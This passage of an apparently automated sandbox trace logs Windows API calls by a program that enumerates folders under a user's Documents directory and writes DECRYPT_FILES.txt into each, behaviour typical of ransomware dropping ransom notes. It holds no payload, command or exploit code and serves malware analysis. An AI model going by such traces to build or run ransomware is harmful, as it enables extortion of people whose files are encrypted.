"c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a4 [0076.178] GetFileType (hFile=0x3a4) returned 0x1 [0076.178] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee590) returned 1 [0076.178] GetFileType (hFile=0x3a4) returned 0x1 [0076.178] WriteFile (in: hFile=0x3a4, lpBuffer=0x223f030*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c0ee668, lpOverlapped=0x0 | out: lpBuffer=0x223f030*, lpNumberOfBytesWritten=0x1c0ee668*=0x9d5, lpOverlapped=0x0) returned 1 [0076.179] CloseHandle (hObject=0x3a4) returned 1 [0076.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.498] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.684] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.744] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.987] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.991] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.008] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.028] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.035] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.108] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.112] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.123] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.143] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0077.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 137 os_tid = 0x850 Thread: id = 138 os_tid = 0x848 [0071.710] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0071.726] CoGetContextToken (in: pToken=0x1c2ef680 | out: pToken=0x1c2ef680) returned 0x0 [0071.727] CObjectContext::QueryInterface () returned 0x0 [0071.729] CObjectContext::GetCurrentThreadType () returned 0x0 [0071.730] Release () returned 0x0 [0071.731] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0071.731] CoUninitialize () [0071.733] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.480] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0072.587] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.701] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0073.813] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.306] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.475] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.723] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0074.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.184] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.243] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.348] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.448] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.557] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.739] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.837] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.930] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0075.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee9e0) returned 1 [0076.061] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x1c2ee4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0076.061] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x1c2ee470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0076.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x1c2ee680 | out: lpFindFileData=0x1c2ee680*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.117] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0076.117] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0076.118] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee930) returned 1 [0076.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee8f0) returned 1 [0076.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee9e0) returned 1 [0076.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", nBufferLength=0x105, lpBuffer=0x1c2ee4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x0) returned 0x31 [0076.118] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", nBufferLength=0x105, lpBuffer=0x1c2ee470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpFilePart=0x0) returned 0x32 [0076.118] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x1c2ee680 | out: lpFindFileData=0x1c2ee680*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.118] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.118] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.118] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0076.119] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0076.119] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2ee6d0 | out: lpFindFileData=0x1c2ee6d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0076.119] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee930) returned 1 [0076.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee8f0) returned 1 [0076.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee0e0) returned 1 [0076.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x1c2edbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0076.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x1c2edb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0076.119] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x1c2edd80 | out: lpFindFileData=0x1c2edd80*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.121] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.121] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0076.121] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0076.121] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee030) returned 1 [0076.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2edff0) returned 1 [0076.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee0e0) returned 1 [0076.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", nBufferLength=0x105, lpBuffer=0x1c2edbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpFilePart=0x0) returned 0x3a [0076.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", nBufferLength=0x105, lpBuffer=0x1c2edb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpFilePart=0x0) returned 0x3b [0076.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x1c2edd80 | out: lpFindFileData=0x1c2edd80*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5de2d0 [0076.122] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.122] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0076.122] FindNextFileW (in: hFindFile=0x1a5de2d0, lpFindFileData=0x1c2eddd0 | out: lpFindFileData=0x1c2eddd0*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 0 [0076.122] FindClose (in: hFindFile=0x1a5de2d0 | out: hFindFile=0x1a5de2d0) returned 1 [0076.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee030) returned 1 [0076.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2edff0) returned 1 [0076.122] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c2edb70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x4c [0076.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee050) returned 1 [0076.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.123] GetFileType (hFile=0x36c) returned 0x1 [0076.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2edfc0) returned 1 [0076.123] GetFileType (hFile=0x36c) returned 0x1 [0076.123] WriteFile (in: hFile=0x36c, lpBuffer=0x21ffa70*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c2ee098, lpOverlapped=0x0 | out: lpBuffer=0x21ffa70*, lpNumberOfBytesWritten=0x1c2ee098*=0x9d5, lpOverlapped=0x0) returned 1 [0076.124] CloseHandle (hObject=0x36c) returned 1 [0076.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\DECRYPT_FILES.txt", nBufferLength=0x105, lpBuffer=0x1c2ee470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\DECRYPT_FILES.txt", lpFilePart=0x0) returned 0x43 [0076.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c2ee950) returned 1 [0076.124] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\DECRYPT_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\decrypt_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x36c [0076.132] GetFileType (hFile=0x36c) returned 0x1 [0076.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c2ee8c0) returned 1 [0076.132] GetFileType (hFile=0x36c) returned 0x1 [0076.132] WriteFile (in: hFile=0x36c, lpBuffer=0x2202b88*, nNumberOfBytesToWrite=0x9d5, lpNumberOfBytesWritten=0x1c2ee998, lpOverlapped=0x0 | out: lpBuffer=0x2202b88*, lpNumberOfBytesWritten=0x1c2ee998*=0x9d5, lpOverlapped=0x0) returned 1 [0076.133] CloseHandle (hObject=0x36c) returned 1 [0076.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.156] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.301] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.350] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.490] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.535] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0076.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 